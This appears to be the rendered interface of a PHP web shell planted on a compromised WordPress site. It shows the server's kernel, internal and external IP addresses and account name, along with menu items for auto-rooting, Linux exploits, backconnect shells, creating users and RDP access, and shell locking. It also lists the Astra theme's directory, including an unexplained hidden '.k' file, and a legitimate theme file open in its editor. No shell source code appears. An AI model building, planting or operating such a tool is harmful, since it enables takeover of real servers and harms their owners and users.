Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-content /
themes /
astra /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
metabox
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
theme-update
[ DIR ]
drwxr-xr-x
.k
58
B
-rw-r--r--
admin-functions.php
1.66
KB
-rw-r--r--
class-astra-after-setup-theme....
7.42
KB
-rw-r--r--
class-astra-dynamic-css.php
227.57
KB
-rw-r--r--
class-astra-global-palette.php
7.76
KB
-rw-r--r--
class-astra-loop.php
6.46
KB
-rw-r--r--
class-astra-mobile-header.php
6.05
KB
-rw-r--r--
extras.php
31.4
KB
-rw-r--r--
google-fonts.php
211.54
KB
-rw-r--r--
index.php
733
B
-rw-r--r--
markup-extras.php
50.92
KB
-rw-r--r--
template-parts.php
9.89
KB
-rw-r--r--
template-tags.php
1.15
KB
-rw-r--r--
widgets.php
5.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template-tags.php
<?php /** * Custom template tags for this theme. * * Eventually, some of the functionality here could be replaced by core features. * * @package Astra */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } if ( ! function_exists( 'astra_entry_footer' ) ) : /** * Prints HTML with meta information for the categories, tags and comments. */ function astra_entry_footer() { if ( ! is_single() && ! post_password_required() && ( comments_open() || get_comments_number() ) ) { echo '<span class="comments-link">'; /** * Get default strings. * * @see astra_default_strings */ comments_popup_link( astra_default_strings( 'string-blog-meta-leave-a-comment', false ), astra_default_strings( 'string-blog-meta-one-comment', false ), astra_default_strings( 'string-blog-meta-multiple-comment', false ) ); echo '</span>'; } astra_edit_post_link( sprintf( /* translators: %s: Name of current post */ esc_html__( 'Edit %s', 'astra' ), the_title( '<span class="screen-reader-text">"', '"</span>', false ) ), '<span class="edit-link">', '</span>' ); } endif;
Close